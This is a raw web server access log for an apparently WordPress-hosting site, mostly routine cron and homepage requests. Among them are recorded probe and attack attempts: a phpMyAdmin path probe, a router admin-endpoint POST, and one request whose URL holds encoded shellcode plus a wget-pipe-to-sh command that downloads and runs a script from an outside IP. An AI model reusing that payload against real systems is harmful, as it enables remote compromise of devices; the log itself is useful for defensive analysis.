112.19.105.85 - - [19/Oct/2025:11:11:21 +0800] "GET /pmd/index.php HTTP/1.1" 404 47 "http://36.133.115.36/pmd/index.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:11:16:33 +0800] "POST /wp-cron.php?doing_wp_cron=1760843793.4642200469970703125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.27 - - [19/Oct/2025:11:16:33 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
124.198.131.83 - - [19/Oct/2025:11:35:13 +0800] "GET /x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/%eb%1f%5e%89%76%08%31%c0%88%46%07%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%db%89%d8%40%cd%80%e8%dc%ff%ff%ffwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.rwx.sh%7Csh%3B HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@tutanota.de)"
36.133.115.36 - - [19/Oct/2025:11:35:13 +0800] "POST /wp-cron.php?doing_wp_cron=1760844913.8192009925842285156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [19/Oct/2025:11:46:52 +0800] "POST /wp-cron.php?doing_wp_cron=1760845612.0017220973968505859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.96.129.4 - - [19/Oct/2025:11:46:52 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [19/Oct/2025:11:48:28 +0800] "POST /wp-cron.php?doing_wp_cron=1760845708.5137209892272949218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [19/Oct/2025:11:48:29 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:12:08:25 +0800] "POST /wp-cron.php?doing_wp_cron=1760846905.0538930892944335937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [19/Oct/2025:12:08:25 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
124.198.131.83 - - [19/Oct/2025:12:22:38 +0800] "POST /goform/setSysAdm HTTP/1.1" 499 0 "http://36.133.115.36/login.shtml" "Mozilla/5.0 (bang2012@tutanota.de)"
36.133.115.36 - - [19/Oct/2025:12:22:39 +0800] "POST /wp-cron.php?doing_wp_cron=1760847759.2262430191040039062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [19/Oct/2025:12:23:59 +0800] "POST /wp-cron.php?doing_wp_cron=1760847839.4052939414978027343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.181.189 - - [19/Oct/2025:12:23:59 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
